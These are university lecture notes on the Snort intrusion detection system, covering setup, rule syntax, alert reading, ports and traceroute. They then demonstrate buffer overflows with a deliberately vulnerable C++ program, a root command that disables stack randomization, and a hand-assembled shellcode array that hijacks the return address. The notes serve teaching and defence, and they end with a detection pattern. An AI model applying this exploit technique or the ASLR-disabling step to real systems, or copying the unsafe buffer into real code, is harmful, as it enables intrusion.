Snort and Applied Intrusion Detection

CS 462 Lecture, Dr. Lawlor

One standard trick for intrusion detection is just to watch ("sniff") all the network traffic, and then log or otherwise freak out when you see known-bad stuff go by. One huge sniffer is called "snort".

Snort

Setting up snort means:

Download the source code from snort.org/dl
Build the source code with "tar xzvf snort-2.8.3.1.tar.gz; cd snort-2.8.3.1; ./configure; make; sudo make install"
Copy the configure directory to a secure place, like /etc: "sudo cp snort-2.4.3/etc /etc/snort"
Edit the "/etc/snort/snort.conf" config file, at least to set the HOME_NET address.
Download snort rules from http://www.snort.org/pub-bin/downloads.cgi. Free registration is required for the latest rules.
Unpack snort rules using "cd /etc/snort; tar xzvf ~/snortrules*", or write your own rules.
Check the snort config file, /etc/snort/snort.conf. It's probably OK.
Run snort as root, like: "snort -de -i eth0 -K ascii -c /etc/snort/snort.conf"

-d shows you everything sent in the packet payloads.
-e shows you everything in the IP header.
-i eth0 says to listen on your first ethernet device
-K ascii says to log things in human-readable (not binary) format.
-c points to the config file to use.

Snort can be configured to send its output to:

The syslog (see /etc/syslog.conf to figure out where, often it's /var/log/warn)
The snort log directory, normally /var/log/snort/<IP ADDRESS>/<PROTOCOL>:<SOURCE PORT>-<DEST PORT>

Snort Rules

Snort rules use a really hideous syntax, and like me you can spend several hours reading the documentation and still not be able to write snort rules! It's easier to start with an example.

Say you're part of the Ministry of Love (responsible for detention and torture) inside a paranoid dictatorship that hates our freedom. You can sniff out dissidents by writing a rule that matches their traffic, like so:

alert tcp any any -> any any (msg:"Crimethink detected"; content:"freedom"; nocase; sid:9998;)

The format of this rule is:

alert: What to do when the rule fires. In this case, our snort.conf says to write such events to a file called /var/log/snort/alert. Other options include "drop" (do not forward the packet), "activate" to chain rules, etc.
tcp: The protocol that matching packets will use. In this case, good old TCP. udp or plain ip also works too.
any: the source IP address. These can be written in a bunch of ways, including numeric, subnet, or negation.
any: the source IP port number.
any: the destination IP address.
any: the destination IP port number.
msg: human-readable string to write in the log files when the rule fires.
content: actual packet data to match. You can also write hex digits between pipes, like "|FF|" or "|F0 0F|" (matches the two bytes 0xf0 followed by 0x0f).
nocase: case-insensitive packet data matching.
sid: Snort ID, which is just an int that shows up in the snort alert file. You can make up a new ID for your own rules.

This rule will alert on the word "freedom" inside any unencrypted TCP communication: web searches, emails, etc.

Here's a super-terse example of a more complicated snort rule. The tighter you write the rule, the fewer false matches you get.

Interpreting Snort Alerts

Here's a typical alert, from the "/var/log/snort/alert" file:
[**] [1:9998:0] Crimethink detected [**]
[Priority: 0]
10/02-15:37:53.223238 0:1D:E0:99:A4:FF -> 0:0:5E:0:1:97 type:0x800 len:0x30D
137.229.48.118:47318 -> 209.85.173.127:80 TCP TTL:64 TOS:0x0 ID:5666 IpLen:20 DgmLen:767 DF
***A**** Seq: 0x73F5AA9D Ack: 0xC3B83424 Win: 0x2E TcpLen: 32
TCP Options (3) => NOP NOP TS: 5749972 1782851874

The important things there are shown in bold:

The Snort ID, 9998
The message, Crimethink detected
The date of the alert, October 2 at 3:37pm (local time).
The source IP address
The source port number
The destination IP address
The destination port number
The length of the incoming datagram

The IP Address:

127.0.0.1 is the "loopback" IP address. Packets sent to this address immediately go back to the sending machine.
UAF's public subnet is 137.229....
10..., 168... are non-routed "private" IP addresses. UAF has a private subnet using 172... addresses.
224..., 232..., and 239... IP addresses are multicast addresses. Addresses ending in .255 are usually subnet broadcast addresses.
Low numbers can be looked up from the first digit and the IANA IP allocation table. Higher numbers are usually listed as "various entities", since they're a huge mix of stuff.
The xkcd map of the internet is interesting too.
Addresses can also be tracked down to a geographic location using one of the many IP to location searches on the web.

A "traceroute" can show you the network hops that take you to a particular IP:

# /usr/sbin/traceroute target.cs.uaf.edu
traceroute to target.cs.uaf.edu (137.229.25.200), 30 hops max, 40 byte packets
 1  48-1.wireless.uaf.edu (137.229.48.1)  1.453 ms   0.869 ms   0.965 ms
 2  * * *
 3  * * *
# /usr/sbin/traceroute finesse.cs.uiuc.edu
traceroute to finesse.cs.uiuc.edu (128.174.241.207), 30 hops max, 40 byte packets
 1  48-1.wireless.uaf.edu (137.229.48.1)  1.531 ms   1.454 ms   0.962 ms
 2  137.229.95.3  1.287 ms   1.357 ms   1.698 ms
 3  swf-6506-1 (137.229.254.145)  4.192 ms   1.591 ms   2.040 ms
 4  swf-m10-1 (137.229.254.209)  4.060 ms   3.088 ms   1.985 ms
 5  core1-ua-GE0-0-0-0.pnw-gigapop.net (209.124.177.129)  3.781 ms   2.983 ms   4.114 ms
 6  core1-wes-so0-2-0-0.pnw-gigapop.net (209.124.179.37)  43.039 ms   43.824 ms   44.104 ms
 7  hnsp2-wes-ge-0-0-0-0.pnw-gigapop.net (209.124.176.12)  42.826 ms   43.579 ms   41.697 ms
 8  abilene-pnw.pnw-gigapop.net (209.124.179.2)  41.180 ms   41.525 ms   43.449 ms
 9  dnvrng-sttlng.abilene.ucaid.edu (198.32.8.50)  69.073 ms   67.277 ms   66.149 ms
10  kscyng-dnvrng.abilene.ucaid.edu (198.32.8.14)  78.379 ms   77.868 ms   77.004 ms
11  iplsng-kscyng.abilene.ucaid.edu (198.32.8.80)  358.250 ms   366.737 ms   365.043 ms
12  chinng-iplsng.abilene.ucaid.edu (198.32.8.76)  93.672 ms   101.860 ms   102.063 ms
13  mren-chin-ge.abilene.ucaid.edu (198.32.11.98)  95.943 ms   96.129 ms   95.261 ms

The Port number. Source port numbers are either large (over 1000) and random, or small (under 1000) and always the same. Low port numbers can only be used by root users, and are often used by system services (e.g., network daemons).

The official IANA port number list, or the much better hyperlinked networksourcery p ort list. This does mix TCP and UDP.
Standard ports include:

TCP port 20 & 21, FTP File Transfer Protocol.
TCP port 22, SSH secure shell file & terminal transfer.
TCP port 25, SMTP insecure email.
UDP port 53, DNS domain name system traffic.
UDP ports 67 & 68, DHCP/BOOTP machine startup configuration.
TCP port 80, HTTP web traffic.
TCP port 109 & 110, POP insecure email.
TCP port 443, HTTPS secure web traffic (via SSL).

Windows-specific ports include:

TCP port 137, 138, 139, NETBIOS name, datagram, and session traffic.
UDP port 1026+, network announcements.

UNIX-specific ports include:

TCP port 23, telnet insecure terminal protocol.

Chatty broadcasting ports include:

UDP port 427, SLP Service Location Protocol. (Macs, Novell)
UDP port 631, IPP, Internet Printing Protocol. (CUPS, other printers)

Buffer Overflow Details

Actual exploits of buffer overflow attacks are pretty useful to understand, because that helps you fight them.

First, the trick is just to fill up the stack beyond the end of the allocated buffer. For example, the string "aaaabbbbccccdddd" overwrites the return function pointer with "dddd" in this program:

int happy_innocent_code(void) {
	char str[8];
	cin>>str;
	cout<<"I just read a string: "<<str<<"!  I'm a big boy!\n";
	return 0;
}

void evil_bad_code(void) {
	cout<<"Mwa ha ha ha...\n";
	cout<<"...er, I can't return.  Crashing.\n";
}

int foo(void) {
	//void *p=(void *)evil_bad_code; /* address of the bad code */
	//printf("evil code is at: '%4s'\n",(char *)&p);
	happy_innocent_code();
	cout<<"How nice!\n";
	return 0;

}

(Try this in NetRun now!)

This crashes, which is bad (so don't use fixed-size char arrays as strings!), but it can do worse than crash; it can execute something malicious. For example, the evil_bad_code is sitting at address 0x8048a44, or as characters, "DŠ" (those last two characters show up in various weird ways on different browsers), so if we input the string "aaaabbbbccccDŠ", the happy_innocent_code above will return directly to the evil_bad_code.

It's even worse if the return address is overwritten with the location of some data the attacker has control over, like the buffer on the stack where the string is stored. Then the attacker can send some machine code, point the return pointer to that code, and then happy_innocent_code will return directly to the attacker's new remote code, usually "shellcode", since it opens a shell the attacker can use to finish off the vulnerable machine.

On Linux, modern kernels will randomly change the location of stuff on the stack, as a way to help defeat buffer overflow attacks. For learning how buffer overflows work, you can disable this by doing (as root):
echo 0 > /proc/sys/kernel/randomize_va_space

On my machine, with stack randomization on I got a different stack address every run:
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfbfb4c0
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbf8bc980
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfb9cc60
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfecd790
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfaeebb0
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfcdada0

Without stack randomization, I get the same address, 0xbffff8c0, for a local variable every time the program is run. If I encode this address into the return function pointer, any machine code loaded into that local variable will get executed. So I can very carefully craft an attack string like this:

unsigned char exploit[exploit_len]={
/* Address       Code                          Assembly  //  Purpose */
/* 0xbffff8c0 */ 0xba, 0x10,0,0,0,          /* mov    $16,%ecx  // the string length, in characters */
                 0xb9, 0xe0,0xf8,0xff,0xbf, /* mov    $exploit+20,%edx // the string's address */
                 0xbb, 0x01,0,0,0,          /* mov    $0x1,%ebx // 1 is the `fd' for stdout */
                 0xb8, 0x04,0,0,0,          /* mov    $0x4,%eax // 4 is the syscall number for `write' */
                 0xcd, 0x80,                /* int $0x80  // makes the `write' syscall */

                 0x31, 0xdb,                /* xor    %ebx,%ebx // 0 is our exit code */
                 0xb8, 0x01,0,0,0,          /* mov    $0x1,%eax // 1 is the syscall number for `exit' */
                 0xcd, 0x80,                /* int    $0x80 // makes the `exit' syscall */
                 
                 0,                 /* padding to 0x20 bytes */
                 
/* 0xbffff8e0 */ 'E','V','I','L','_','D','E','E','D','S','_','H','E','R','E','!', /* String to print */

/* 0xbffff8f0 */ 0xE5,0,0,0, 0xE6,0,0,0,    /* more padding */

/* 0xbffff... */ 0xE7,0,0,0,                /* saved frame pointer-- not needed */
/* 0xbffff... */ 0xc0,0xf8,0xff,0xbf,       /* saved program counter-- make address of our exploit! */
};

Here I'm making explicit Linux syscalls in order to print out my string. Note that not only is this sort of attack code painfully annoying to write, it's also very brittle--if you change anything on the attacked machine, the attack will fail. Things that can kill off a buffer overflow attack include:

Changing the stack pointer. This moves the local variable holding your shellcode, making it much tougher to jump into it. This is now on by default on all Linux machines.
Changing the stack layout. Same deal, but usually requires a recompile, like a version upgrade.
Changing anything about the machine architecture: machine code, syscall constants, etc. Linux attacks won't work on Windows, and vice versa. x86 attacks won't work on PowerPC, and vice versa.

Overall, weirdness is your friend here!

As a defender, you can pattern-match anything inside this chunk of code. In particular, the bytes 0xCD 0x80 are needed to call Linux for anything, so they're a common pattern to match on. Lots of non-ascii (nul and things) in what is supposed to be a string buffer is also a clear sign of an attack!